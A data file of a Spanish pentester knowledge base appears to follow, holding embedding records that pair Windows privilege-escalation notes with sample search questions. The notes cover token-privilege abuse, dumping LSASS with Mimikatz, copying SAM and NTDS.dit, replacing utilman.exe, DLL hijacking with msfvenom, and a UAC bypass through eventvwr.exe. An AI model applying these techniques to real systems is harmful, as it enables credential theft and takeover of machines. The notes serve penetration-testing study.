-0.11938, 0.01619, 0.01924, -0.08533, 0.11512, 0.08622, 0.13242, -0.05208, 0.11172, 0.01803, -0.10265, -0.02148, -0.09663, -0.00807, -0.16147, -0.05444, 0.02361, -0.0065, -0.15917, -0.01015, -0.04835, 0.01902, 0.06913, -0.13252, -0.05578, 0.07405, -0.10877, 0.02522, -0.04605, 0.09537, 0.01787, 0.08214, -0.14394, 0.19146, 0.11018, -0.02218, -0.01685, 0.02351, 0.04041, 0.0069, -0.0587, -0.14804, -0.10946, 0.02175, 0.07391, -0.11798, 0.16945, 0.00492, -0.01436, -0.02822, -0.13051, 0.07938, 0.0268, 0.04317, 0.01531, -0.08497, 0.03126, -0.02003, -0.0384, 0.08392, 0.01246, 0.05139, -0.0075, 0.0244, -0.02623, -0.01203, 0.00834, 0.023, 0.06123, 0.06655, -0.02897, 0.02225, -0.04561, 0.0905, -0.04121, -0.05389, 0.00962, 0.00378, 0.01557, -0.13571, 0.02888, 0.12398, -0.05924, 0.08291, 0.05664, 0.03793, 0.08549, 0.00681, -0.03619, 0.04756, 0.02598, -0.041, -0.0599, 0.16611, -0.01521, 0.08271, -0.06802, -0.02499, 0.00013, -0.02082, 0.04111, -0.01572, -0.06713, -0.01355, 0.00531, 0.05619, -0.00629, -0.10433, 0.1007, -0.04973, -0.04152, 0.02241, 0.00691, 0.02238, 0.04865, 0.02592, -0.01746, 0.09109, -0.04843, -0.04931, 0.00351, -0.0203, -0.05258, 0.04098, -0.0224, 0.04188, 0.05246, -0.14123, -0.08101, -0.03986, 0.02322, 0.02757, -0.03673, -0.03935, 0.05136, 0.05928, 0.04037, -0.01205, -0.03402, -0.00338, 0.01968, -0.01234, 0.0222, 0.06177, -0.01729, 0.02405, -0.00301, -0.05188, -0.08366, 0.06144, 0.00505, -0.04863, 0.01759, -0.00397, -0.00658, -0.11828, 0.00296, 0.06644, 0.079, 0.03652, 0.05021, -0.0088, 0.08293, -0.08799, -0.0016, -0.06544, -0.00754, -0.0489, 0.04793, -0.06183, -0.0109, 0.00905, 0.04836, -0.01877, 0.01016, -0.10611, 0.04456, -0.05739, -0.02553, -0.00584, 0.05352, -0.02475, 0.00667, -0.0204, -0.01004, 0.03398, -0.00691, -0.08714, 0.06576, -0.00226, -0.02212, 0.03156, -0.00799, -0.0038, 0.02789, 0.10116, -0.04694, -0.0353, -0.04443, 0.04458, 0.0794, 0.00098, 0.01996, -0.03583, -0.01005, -0.0081, -0.04407, 0.00328, -0.02567, -0.01268, 0.02683, -0.00961, 0.08718, -0.00147, 0.00201, -0.01363, 0.02569, 0.00296, 0.02588, -0.02143, -0.01948, 0.03627, -0.03862, 0.02453, 0.0835, -0.02862, -0.05385, -0.05545, -0.01884, -0.02697, -0.02139, 0.08022, 0.02036, -0.06378, -0.04133, -0.03233, -0.04465, 0.03893, -0.0267, -0.05168, -0.09791, 0.03207, 0.07742, -0.02472, 0.05069, -0.03559]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Privilegios de token (SeXxxPrivilege)\n```\nSeImpersonate / SeAssignPrimaryToken β†’ Potato attacks\nSeBackupPrivilege β†’ lees ficheros restringidos (copias SAM/SYSTEM, NTDS.dit)\nSeRestorePrivilege β†’ escribes donde quieras: sustituye utilman.exe por cmd.exe\nSeDebugPrivilege β†’ vuelcas LSASS β†’ Mimikatz\nSeTakeOwnership β†’ te apropias de objetos protegidos\n```", "indexar": "con que programa puedo leer copias restringidas como SAM o NTDS", "v": [-0.11126, -0.10631, -0.00769, -0.10297, 0.02126, -0.11111, -0.0424, 0.09704, -0.1411, 0.15378, -0.04068, -0.11545, 0.03201, -0.19141, -0.01366, 0.0166, 0.02789, -0.06515, 0.07483, 0.07492, -0.01519, -0.17313, -0.00889, -0.03411, 0.09453, 0.00704, 0.07379, -0.03788, -0.04172, 0.06148, -0.04687, 0.05085, 0.07719, -0.08972, -0.06058, -0.04852, -0.01202, 0.05988, -0.00087, 0.05484, 0.08427, 0.14637, -0.0448, 0.04655, 0.1518, -0.1484, -0.03422, -0.00116, -0.00638, -0.13104, -0.10497, 0.05276, -0.07148, -0.13995, -0.0032, -0.12578, 0.07434, -0.05702, -0.11866, 0.11092, -0.00608, 0.0123, 0.10934, -0.10408, 0.0875, -0.0758, 0.15451, -0.0195, -0.01897, 0.07741, -0.05922, 0.00954, 0.04609, -0.08956, -0.05475, 0.01701, -0.09185, -0.08714, 0.02576, -0.02593, 0.01174, -0.12482, 0.01764, 0.07489, 0.04775, -0.04059, -0.0644, 0.01036, -0.02565, -0.04165, 0.03136, 0.0477, 0.06806, 0.01295, 0.04889, -0.0426, 0.04415, 0.07782, 0.00069, 0.04715, 0.06589, -0.05508, -0.03822, 0.04639, -0.12451, 0.08954, 0.07876, -0.03274, -0.07455, 0.06696, 0.06072, 0.01764, -0.05944, 0.0107, -0.03616, -0.05083, -0.00692, 0.05856, -0.00507, -0.0114, 0.01125, -0.02806, -0.03263, -0.03383, 0.09588, 0.04556, -0.04123, 0.06573, -0.1072, -0.05742, 0.00638, 0.08262, -0.00205, 0.00211, 0.00847, -0.08391, -0.1006, -0.01796, -0.0018, -0.09926, -0.00701, 0.05292, 0.06062, 0.07949, -0.00838, 0.01454, -0.02764, -0.05377, 0.01352, 0.02003, 0.022, 0.00767, 0.03463, 0.05635, -0.01469, 0.08133, 0.06651, -0.03118, 0.00591, 0.09712, -0.00629, 0.1165, -0.03526, -0.04801, 0.06164, -0.00588, -0.04247, -0.02017, 0.02127, -0.01641, -0.09385, 0.01867, 0.015, -0.04125, 0.00252, -0.06302, 0.00196, -0.04238, -0.01998, -0.08563, -0.06186, 0.05036, 0.0201, -0.02766, -0.00155, -0.06786, -0.02798, 0.09396, 0.0248, -0.03835, 0.03347, 0.05543, -0.01337, -0.04914, -0.01715, 0.00134, -0.03136, 0.06044, 0.05003, 0.01756, -0.10186, -0.0407, -0.09265, -0.03962, 0.07789, 0.06916, -0.06603, 0.09366, 0.00612, 0.07716, 0.02278, -0.00592, 0.00676, -0.00088, -0.08246, -0.06204, -0.00445, 0.02066, 0.01182, 0.01039, 0.03254, 0.05971, 0.09799, 0.03426, 0.01904, -0.08131, 0.05952, 0.04164, 0.07012, 0.05454, 0.01812, 0.03182, 0.02767, -0.00492, 0.05696, 0.02584, -0.02343, 0.03205, -0.04517, -0.02707, -0.0008, 0.08605, 0.01169, -0.02397, -0.01105, -0.01166, -0.05702, -0.00323, 0.05786, -0.02841, 0.03969, -0.00239, 0.05022, -0.06751, 0.02677, 0.00951]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Privilegios de token (SeXxxPrivilege)\n```\nSeImpersonate / SeAssignPrimaryToken β†’ Potato attacks\nSeBackupPrivilege β†’ lees ficheros restringidos (copias SAM/SYSTEM, NTDS.dit)\nSeRestorePrivilege β†’ escribes donde quieras: sustituye utilman.exe por cmd.exe\nSeDebugPrivilege β†’ vuelcas LSASS β†’ Mimikatz\nSeTakeOwnership β†’ te apropias de objetos protegidos\n```", "indexar": "cual es una herramienta para sustituir utilman.exe por cmd.exe", "v": [-0.07029, -0.01467, -0.12196, -0.07827, 0.14361, -0.11433, -0.08186, 0.01688, -0.04111, -0.00846, -0.16621, -0.04143, -0.034, -0.03418, -0.09129, -0.03689, 0.03659, -0.06736, -0.00034, -0.03451, 0.00072, 0.05547, -0.02232, 0.07941, -0.013, 0.20744, -0.11036, -0.01928, -0.09959, -0.05229, -0.02493, 0.08521, 0.06004, -0.11109, 0.0012, 0.00629, 0.03256, -0.02538, 0.01919, 0.1184, 0.12353, 0.01027, -0.14764, 0.04668, -0.03253, -0.06016, 0.0281, 0.05574, 0.21033, 0.00803, -0.02334, -0.10967, -0.12499, 0.01014, 0.11045, -0.09271, 0.19475, -0.17803, -0.01807, -0.01301, -0.09253, 0.01087, 0.03, 0.0531, 0.01654, 0.04732, 0.05054, -0.1255, -0.15085, 0.11315, -0.06929, 0.0372, 0.00218, -0.0199, -0.02611, -0.11958, -0.05003, -0.03089, 0.06511, -0.01059, 0.02669, 0.013, -0.07953, -0.07457, -0.03513, -0.07765, -0.00192, -0.04547, -0.01456, -0.07895, 0.03775, -0.00698, 0.01113, 0.08751, 0.09197, -0.09985, 0.04948, 0.02266, 0.06536, 0.01803, 0.06828, -0.00266, -0.06327, 0.10985, -0.07959, -0.05503, -0.08411, 0.06345, -0.14899, 0.05984, 0.09204, 0.02938, 0.01391, 0.05078, -0.01404, -0.04216, -0.06341, -0.04737, -0.08007, -0.05369, 0.00254, -0.02262, -0.08827, 0.01702, -0.04484, -0.06486, -0.01513, 0.10376, -0.01688, -0.04359, 0.03115, -0.0753, 0.00995, -0.0618, -0.09351, -0.04734, 0.08205, -0.04157, -0.10032, -0.0669, 0.06112, 0.09583, -0.01221, 0.00344, 0.03804, 0.01674, 0.02454, 0.04379, 0.06153, 0.03256, 0.09905, -0.02882, 0.01583, 0.07061, -0.05097, 0.00657, -0.01655, 0.10861, -0.01966, 0.00684, -0.04118, -0.08023, 0.0201, -0.04584, -0.03313, -0.02414, 0.04302, 0.00716, 0.03821, 0.07972, 0.00401, 0.07832, 0.02845, -0.08818, -0.0035, -0.09809, -0.03166, -0.11523, 0.05215, -0.02802, -0.01903, -0.01633, 0.03724, -0.00685, 0.01892, -0.0405, 0.02022, -0.00591, -0.11857, 0.01449, -0.05164, -0.00786, -0.05412, -0.08848, 0.03648, 0.0293, -0.00165, -0.08462, 0.00421, -0.02473, -0.05284, -0.00062, -0.02448, -0.06389, 0.03776, 0.00029, -0.02012, -0.05613, -0.01834, -0.01102, 0.03175, 0.04282, 0.0157, 0.05815, -0.00319, -0.06259, 0.03845, 0.01535, -0.00443, -0.00703, -0.00975, -0.0039, 0.04355, -0.07265, -0.03457, -0.00512, 0.01679, -0.02982, -0.0186, 0.0026, -0.00282, -0.03303, 0.03273, -0.04677, 0.01332, -0.01276, 0.00853, -0.06809, 0.00129, -0.02761, -0.01922, 0.05452, -0.01153, -0.04719, -0.05571, 0.00391, -0.0153, -0.00981, -0.00195, -0.03752, -0.05821, 0.0417, 0.02816, -0.0185, -0.02127, 0.00131]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Privilegios de token (SeXxxPrivilege)\n```\nSeImpersonate / SeAssignPrimaryToken β†’ Potato attacks\nSeBackupPrivilege β†’ lees ficheros restringidos (copias SAM/SYSTEM, NTDS.dit)\nSeRestorePrivilege β†’ escribes donde quieras: sustituye utilman.exe por cmd.exe\nSeDebugPrivilege β†’ vuelcas LSASS β†’ Mimikatz\nSeTakeOwnership β†’ te apropias de objetos protegidos\n```", "indexar": "que software sirve para acceder a la memoria de LSASS y extraer credenciales", "v": [-0.04138, -0.04365, -0.14492, -0.12608, 0.03241, -0.0802, -0.05378, -0.06904, -0.16297, 0.00965, -0.15993, -0.0099, -0.00566, -0.11048, 0.17344, -0.05377, 0.12862, -0.02888, -0.03734, 0.12827, 0.03766, -0.04123, -0.19201, -0.01852, -0.014, 0.04441, -0.01295, -0.03412, -0.03642, 0.11669, -0.07118, 0.05385, -0.02855, -0.0579, -0.00087, 0.02297, -0.10371, 0.13123, 0.00341, 0.10359, 0.14317, 0.11676, -0.003, 0.00719, 0.06023, -0.10961, 0.02586, 0.10493, 0.01413, -0.02741, -0.04047, -0.03871, -0.04272, -0.04299, 0.02526, -0.02661, 0.02214, -0.04863, -0.05822, -0.03952, -0.07685, 0.03137, 0.0022, -0.00027, 0.05625, -0.04277, 0.06993, -0.0315, -0.04999, 0.05318, -0.19528, 0.05928, 0.13778, -0.04167, -0.06831, -0.06967, -2e-05, 0.06073, 0.0493, 0.04531, 0.02227, -0.09451, -0.03634, 0.03577, 0.0203, 0.00988, 0.04447, -0.04736, -0.01301, -0.02158, 0.06643, 0.11715, -0.03073, 0.19771, 0.06746, 0.00993, 0.04988, 0.14926, 0.07458, 0.10376, -0.00376, -0.14439, -0.02934, 0.19145, -0.04698, -0.00095, 0.04023, 0.00245, -0.0623, -0.07102, 0.01385, 0.03281, -0.0534, -0.01596, -0.08352, 0.03024, 0.00074, -0.04439, 0.08501, -0.01256, 0.06655, -0.15661, 0.06177, -0.05895, -0.04059, 0.03958, -0.092, 0.04923, -0.10562, -0.03084, -0.02806, 0.0575, -0.01916, -0.00392, 0.0547, 0.00071, 0.01162, -0.00019, 0.02126, 0.03107, 0.03535, 0.02067, -0.04914, -0.01874, -0.04735, 0.01431, 0.03375, 0.0507, 0.0369, -0.07033, 0.01623, 0.02591, 0.01134, 0.02223, -0.06341, -0.00262, 0.06344, 0.00433, -0.09674, 0.05754, -0.1373, 0.02592, 0.02364, -0.01251, -0.04723, -0.05139, -0.0521, 0.01647, 0.07812, 0.08679, -0.02327, -0.04483, -0.00329, -0.088, -0.00626, -0.01976, -0.00146, -0.04813, -0.00371, -0.01197, -0.05345, -0.03035, -0.01454, 0.05226, -0.06417, -0.05203, -0.03126, -0.02061, -0.0429, -0.05378, -0.01699, 0.01074, 0.05046, -0.0409, 0.02471, -0.02612, -0.03992, 0.00425, 0.05077, 0.02755, -0.10336, 0.06636, -0.01959, 0.0133, 0.04368, 0.10604, 0.05229, 0.06736, -0.04815, 0.03786, -0.00217, -0.03764, 0.04101, 0.0074, -0.09296, -0.03055, 0.01711, 0.04692, -0.02463, -0.02929, -0.00549, -0.02649, 0.0742, 0.02607, -0.05572, -0.03454, 0.02375, 0.05918, -0.02797, -0.04154, -0.03585, 0.06426, -0.03306, -0.02691, 0.0368, -0.0072, -0.02968, -0.00802, -0.00808, -0.06658, 0.00158, 0.01388, -0.053, -0.01858, -0.06044, -0.04467, -0.02602, 0.01864, 0.08879, -0.03169, -0.02905, -0.00693, 0.02481, 0.01504, 0.02394, -0.00272]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Otras tΓ©cnicas (del sitio)\n- **DLL hijacking**: servicio que carga una DLL por ruta insegura β†’ pones tu DLL (msfvenom `-f dll`) y reinicias el servicio.\n- **UAC bypass** vΓ­a `eventvwr.exe` (hijack de registro) cuando ya tienes cΓ³digo en un user del grupo Administrators.\n- **Unattend.xml / cmdkey / registro** β†’ credenciales en disco (ya en los 10 olvidados).", "indexar": "que tΓ©cnica sirve para cargar una DLL insegura y reiniciar un servicio?", "v": [0.10428, -0.03869, -0.21103, -0.09998, 0.05295, -0.15741, -0.0702, -0.00706, 0.06635, 0.00397, -0.10791, -0.16144, 0.04361, -0.1435, 0.03051, -0.00522, 0.01834, -0.0953, 0.03463, -0.00469, 0.07263, 0.02056, -0.09241, -0.13775, -0.06693, 0.01082, 0.02861, -0.11761, -0.26002, -0.03001, -0.03709, -0.03517, 0.15816, -0.08145, -0.03386, -0.01, 0.01773, 0.09734, 0.08793, 0.02874, -0.0002, 0.03428, -0.0664, 0.06441, 0.08044, -0.0264, 0.17227, -0.05011, 0.07595, -0.00928, 0.00135, 0.04797, -0.04559, -0.13139, -0.08267, 0.10125, 0.12222, -0.09703, 0.00164, -0.04034, -0.02623, -0.00535, -0.00612, 0.05717, 0.10622, -0.03741, -0.05518, 0.06741, -0.00747, 0.01991, -0.01981, 0.01538, 0.05932, -0.03059, -0.12286, -0.05813, 0.0085, -0.00271, 0.0938, 0.09286, 0.08582, 0.03856, -0.03737, -0.01891, -0.11793, -0.04553, -0.00137, 0.02302, 0.05738, -0.11951, 0.11826, 0.07101, 0.03368, 0.03907, -0.00256, 0.09535, 0.10987, 0.00739, -0.03833, -0.065, 0.12246, -0.00445, 0.09156, 0.05844, 0.00256, -0.01224, -0.00644, -0.06771, 0.09324, -0.08949, 0.00471, 0.00779, 0.01341, 0.02585, -0.07552, -0.01319, -0.00025, -0.07516, -0.00901, 0.05687, -0.01082, -0.00409, 0.143, 0.00094, 0.05549, -0.01416, 0.03375, 0.02391, 0.0277, 0.01417, 0.01764, -0.03694, -0.00573, -0.02873, -0.03109, -0.0574, 0.04567, -0.05442, -0.03847, 0.05323, 0.0405, 0.12093, -0.0395, 0.02278, 0.01247, 0.07084, 0.14377, -0.06522, -0.05484, -0.04263, 0.04064, 0.1052, -0.00671, 0.04344, -0.07014, -0.00093, 0.01491, -0.05009, -0.01505, 0.10785, 0.0541, 0.03345, 0.08916, 0.02161, -0.0933, -0.00279, -0.05513, -0.04118, 0.01884, 0.04622, -0.02368, -0.03242, -0.02028, -0.03329, 0.02008, 0.0026, -0.05083, -0.07241, 0.06194, -0.06531, -0.01428, -0.05022, 0.09385, 0.03541, 0.02399, -0.0578, -0.05931, -0.03129, -0.00495, -0.00314, -0.01515, -0.02487, -0.03481, 0.01944, -0.01981, 0.0125, -0.01051, -0.01523, -0.05487, 0.02137, -0.0406, -0.00927, -0.09063, 0.03128, 0.02158, -0.05673, -0.02954, 0.02731, -0.04424, 0.01044, -0.02902, 0.0054, 0.11105, 0.02366, -0.03882, -0.0565, 0.01229, -0.0191, -0.05746, 0.05075, 0.01144, -0.02216, -0.06002, 0.05899, 0.02003, -0.03969, 0.04832, -0.00896, 0.04953, 0.0064, 0.02, 0.06816, -0.03109, 0.03352, 0.04855, -0.03441, 0.03328, -0.06833, 0.02087, -0.01481, 0.02672, 0.05725, -0.04005, -0.07536, 0.02168, -0.0114, -0.04672, 0.0405, -0.03702, -0.02853, 0.01174, 0.01662, 0.03525, 0.01514, 0.0321, -0.07058]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Otras tΓ©cnicas (del sitio)\n- **DLL hijacking**: servicio que carga una DLL por ruta insegura β†’ pones tu DLL (msfvenom `-f dll`) y reinicias el servicio.\n- **UAC bypass** vΓ­a `eventvwr.exe` (hijack de registro) cuando ya tienes cΓ³digo en un user del grupo Administrators.\n- **Unattend.xml / cmdkey / registro** β†’ credenciales en disco (ya en los 10 olvidados).", "indexar": "cΓ³mo puedo evitar el control de cuenta de usuario usando eventvwr.exe?", "v": [-0.14838, 0.12716, -0.23345, -0.11994, 0.08252, -0.04371, -0.04044, -0.04193, -0.02654, -0.17062, -0.20343, -0.11855, -0.05238, 0.02298, -0.02745, -0.07404, 0.18614, 0.05502, 0.03096, 0.00938, 0.0133, -0.06233, 0.02175, 0.01046, -0.00621, 0.10939, -0.10906, 0.03751, -0.05906, -0.08008, -0.05109, 0.06409, 0.04895, -0.08134, 0.03776, 0.03186, 0.00432, 0.03503, 0.07607, 0.12611, 0.05276, 0.00994, -0.18149, 0.06023, 0.07173, -0.00641, -0.02746, -0.04396, 0.07697, -0.01113, 0.00427, 0.00336, -0.17708, -0.00674, 0.04779, -0.04788, 0.05956, -0.17995, 0.04424, -0.01838, 0.04521, -0.03656, 0.02729, 0.16342, -0.03467, -0.03306, 0.06748, -0.05642, -0.076, 0.07564, -0.06302, 0.00974, -0.01811, 0.00299, 0.08317, -0.10032, 0.02809, -0.00519, 0.05581, -0.01871, -0.08671, -0.00087, -0.0382, -0.02795, -0.10677, -0.06857, -0.02403, -0.07371, -0.018, -0.07641, 0.07753, -0.0025, 0.06349, -0.03481, 0.0314, -0.12851, 0.03763, 0.02535, -0.01355, 0.03536, 0.09125, -0.00756, -0.05825, 0.09514, -0.01479, -0.04785, 0.05847, -0.04079, -0.02526, -0.08607, -0.0217, 0.0062, -0.09918, -0.03514, -0.04471, 0.0691, -0.03438, -0.05564, -0.01379, 0.00074, -0.05506, -0.05657, 0.04846, -0.00206, 0.04929, -0.04508, 0.01344, 0.1754, -0.04723, -0.02953, -0.01681, -0.01898, -0.00213, -0.00157, -0.03287, -0.01154, -0.03343, -0.01002, -0.07938, -0.00759, 0.04847, 0.10665, 0.00094, -0.02222, 0.08324, -0.02648, -0.03516, 0.00498, -0.0152, 0.07785, 0.10853, -0.05865, -0.03249, 0.03913, -0.02978, -0.03562, -0.07207, -0.03045, 0.08689, 0.0264, -0.0684, 0.05653, -0.00349, 0.01193, -0.00413, -0.07468, 0.05186, -0.03002, 0.03684, 0.0212, -0.03259, 0.11202, 0.01557, -0.10102, 0.05046, -0.09458, -0.00412, -0.10601, 0.02333, -0.07623, -0.01577, -0.02638, -0.00028, -0.03886, -0.00383, -0.03729, 0.02378, 0.00521, 0.03445, 0.09604, -0.02098, 0.08298, 0.00791, -0.07643, 0.0219, -0.02869, -0.00883, -0.02849, 0.0104, -0.03159, -0.02528, -0.00895, 0.03417, -0.03542, 0.07424, -0.00363, -0.07493, 0.02234, 0.01668, 0.00822, 0.0749, -0.01503, 0.05668, -0.02443, -0.04406, -0.02556, 0.03969, -0.03688, -0.00105, -0.04489, 0.01037, 0.0118, 0.06159, 0.00226, -0.01388, -0.04635, 0.05217, -0.03458, 0.00222, 0.05894, -0.0361, 0.0297, -0.00303, -0.025, 0.07838, 0.01451, 0.03994, -0.01472, -0.01388, -0.02978, -0.00876, 0.05997, -0.04355, -0.07523, -0.06885, -0.03429, -0.1224, 0.04441, -0.04071, -0.0698, 0.03909, 0.00754, 0.07336, -0.02896, -0.02411, 0.01231]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Otras tΓ©cnicas (del sitio)\n- **DLL hijacking**: servicio que carga una DLL por ruta insegura β†’ pones tu DLL (msfvenom `-f dll`) y reinicias el servicio.\n- **UAC bypass** vΓ­a `eventvwr.exe` (hijack de registro) cuando ya tienes cΓ³digo en un user del grupo Administrators.\n- **Unattend.xml / cmdkey / registro** β†’ credenciales en disco (ya en los 10 olvidados).", "indexar": "quΓ© mΓ©todos existen para guardar credenciales ocultas en disco mediante registro?", "v": [-0.08495, -0.00598, -0.26587, -0.06081, -0.00609, -0.02393, -0.0236, -0.01039, -0.15695, -0.19505, 0.01265, -0.02312, -0.10565, -0.08557, 0.17276, -0.01086, 0.14753, 0.01602, -0.02589, -0.08082, -0.09124, -0.14277, -0.0065, -0.00646, 0.00792, -0.07268, 0.04587, -0.05878, -0.06059, 0.05488, 0.06204, 0.04821, -0.08687, -0.04874, -0.08694, -0.01648, -0.05466, -0.06163, -0.02684, 0.05747, -0.01528, 0.0293, 0.0267, 0.16341, 0.00797, -0.09818, -0.00624, 0.12418, -0.06447, 0.05217, 0.003, -0.07391, -0.14832, -0.06533, -0.02719, -0.176, -0.0308, 0.05739, 0.08837, 0.03304, -0.05021, 0.06199, 0.04401, 0.16118, 0.03222, -0.07679, 0.04915, -0.10791, -0.10513, 0.0758, -0.03466, 0.02386, 0.12122, -0.02618, 0.01249, -0.01919, 0.09096, -0.00681, 0.01202, -0.01554, -0.09513, -0.05966, 0.01159, 0.06934, -0.12747, -0.07537, -0.0014, -0.00116, -0.05237, -0.06356, 0.0577, -0.031, -0.06803, 0.01791, 0.08217, -0.00218, 0.06956, 0.06758, 0.0014, 0.04802, 0.03186, 0.07811, -0.05108, 0.06231, 0.03024, 0.08352, 0.01744, -0.06079, 0.06696, 0.03731, 0.02816, 0.08762, -0.09517, -0.09184, 0.03861, -0.00161, 0.03384, -0.00353, -0.02019, 0.0369, -0.04521, 0.00299, -0.05433, 0.03414, 0.06678, -0.05126, -0.04162, 0.05229, -0.06664, -0.00145, -0.06832, -0.07626, -0.07669, 0.01314, 0.06718, 0.01173, -0.08647, -0.03872, 0.03271, -0.0009, 0.11014, 0.00738, -0.09639, -0.11446, 0.04755, -0.02974, 0.00182, -0.02872, -0.06847, -0.0553, 0.01316, 0.05553, -0.03614, 0.02011, -0.0389, 0.0832, 0.03756, -0.15223, -0.0086, 0.00327, 0.04153, 0.02505, -0.02321, -0.02806, -0.0854, -0.06653, 0.03099, -0.01205, -0.01495, 0.01306, -0.00149, 0.02465, 0.05221, -0.08745, 0.0274, -0.04293, -0.02742, -0.09808, 0.05353, -0.02102, -0.02407, 0.03194, 0.02698, -0.02513, 0.03808, -0.02997, 0.04744, 0.01435, -0.00418, 0.01885, 0.09164, -0.02984, -0.01289, 0.0123, -0.04759, 0.00352, -0.01038, -0.01235, 0.02725, 0.02642, -0.05867, -0.05775, 0.01733, -0.0394, 0.00625, 0.01207, -0.09115, 0.00967, -0.00825, -0.02456, 0.05817, -0.07777, 0.07293, -0.06915, -0.02924, 0.02886, -0.05998, 0.00415, -0.07587, -0.01407, 0.01329, -0.00204, 0.02828, -0.04952, 0.02227, -0.00466, -0.01179, 0.08721, 0.08065, 0.03798, -0.03324, 0.04344, -0.04366, 0.04136, 0.04534, 0.02232, 0.00758, -0.04902, -0.02486, -0.06152, 0.00066, 0.04591, -0.02928, -0.03192, -0.04008, -0.03456, -0.04271, 0.07593, 0.00719, -0.05317, 0.01036, 0.00537, 0.00765, -0.03712, 0.08132, -0.10086]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Herramientas\n`PowerUp`, `PrivescCheck`, `Sherlock` (PowerShell) + `accesschk.exe` (SysInternals) β†’ ver Herramientas (Γ­ndice) y PEASS-ng.", "indexar": "con que puedo verificar si un usuario tiene permisos de administrador en Windows?", "v": [0.04272, 0.1609, -0.12169, -0.18145, 0.04022, -0.02133, -0.02345, -0.13021, -0.05844, -0.19467, 0.06201, -0.07787, 0.0173, -0.05386, 0.02409, -0.04428, 0.09066, -0.06134, 0.06491, 0.09865, 0.14605, -0.08207, 0.03176, 0.04141, -0.04509, 0.05314, 0.0325, -0.08915, -0.08846, -0.08988, 0.02367, -0.01232, -0.00184, -0.0394, -0.00726, 0.05015, -0.04054, 0.07799, 0.04793, 0.09561, 0.04206, 0.1122, -0.06116, 0.05455, 0.01912, -0.00879, -0.02739, -0.1085, 0.05127, -0.05105, -0.02341, -0.06824, -0.13389, -0.03051, 0.02344, -0.0083, 0.13755, -0.07285, 0.07996, 0.0078, -0.04334, 0.03698, 0.01595, 0.11957, -0.06614, 0.06298, 0.13874, 0.02287, 0.02331, 0.08972, -0.06744, 0.07074, -0.01473, -0.01447, 0.04703, 0.04136, -0.08681, -0.00625, 0.11609, -0.0088, 0.06716, 0.07486, -0.05917, -0.09423, -0.1064, -0.18927, -0.07854, -0.13895, 0.03007, -0.07543, 0.05579, 0.01422, -0.01623, 0.02321, 0.02572, -0.03537, 0.03177, 0.03132, -0.07142, 0.09377, 0.02258, -0.00787, -0.01687, 0.148, -0.06301, 0.069, 0.04487, -0.10493, -0.05589, -0.04114, 0.02714, 0.0226, -0.12606, -0.01731, -0.02457, 0.07492, -0.08239, -0.15172, -0.04489, 0.00829, -0.03903, -0.04089, -0.01665, 0.04844, 0.05035, -0.03616, 0.00072, 0.15101, -0.04359, 0.01573, 0.00612, -0.03175, -0.04011, -0.00911, -0.11178, 0.06609, -0.10384, -0.00367, -0.01782, -0.00836, -0.0093, 0.08657, 0.08416, 0.0109, 0.11131, 0.0404, -0.07713, 9e-05, -0.08486, -0.05348, 0.05523, -0.03952, -0.02574, 0.11189, -0.02859, 0.05503, 0.01507, 0.00538, 0.05844, 0.05928, 0.04922, 0.01188, -0.0202, 0.03512, 0.02885, 0.00625, -0.05213, -0.01636, 0.06792, -0.01834, -0.09442, 0.0426, -0.01627, -0.05118, 0.04571, -0.00322, 0.00812, -0.05137, -0.02173, -0.03135, -0.07901, 0.0279, -0.04117, -0.00899, -0.07363, -0.02849, -0.02925, 0.0723, -0.0058, 0.04707, 0.02988, 0.0776, 0.05185, -0.02556, 0.04311, -0.02204, 0.00348, 0.00472, -0.03473, -0.05299, -0.02076, 0.00221, -0.05127, -0.06082, 0.07667, -0.0241, -0.03299, 0.07173, 0.07644, 0.00798, 0.0202, -0.02179, 0.05715, -0.05343, -0.07528, -0.06095, 0.05832, 5e-05, -0.02029, -0.05987, 0.04018, 0.04404, 0.06406, 0.01972, 0.06154, -0.05173, -0.00926, 0.00457, 0.01103, 0.08417, -0.02442, 0.06554, -0.00416, -0.02105, 0.06622, 0.01677, 0.05357, -0.0377, 0.00013, -0.02224, -0.00735, 0.05442, 0.01556, -0.05103, -0.04476, -0.02142, -0.06062, 0.01342, -0.03966, -0.08172, 0.04388, 0.02486, 0.03668, -0.05188, -0.00788, -0.00958]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Herramientas\n`PowerUp`, `PrivescCheck`, `Sherlock` (PowerShell) + `accesschk.exe` (SysInternals) β†’ ver Herramientas (Γ­ndice) y PEASS-ng.", "indexar": "cual es una herramienta para revisar la configuraciΓ³n de acceso al sistema?", "v": [-0.05065, 0.08242, -0.13074, -0.25795, 0.10661, -0.18106, -0.11149, -0.10886, -0.0983, -0.00391, -0.11002, -0.16462, -0.05412, -0.06542, 0.13812, -0.04352, 0.045, -0.08471, -0.02205, 0.03239, -0.0425, -0.0508, -0.10069, 0.03052, -0.12845, 0.07108, 0.06037, -0.10177, -0.19196, -0.01062, 0.00023, -0.04717, 0.04574, -0.00079, -0.08688, 0.02494, 0.09636, 0.11217, 0.04471, 0.07628, 0.02405, -0.00968, -0.02107, 0.09874, 0.05359, -0.10079, 0.05022, 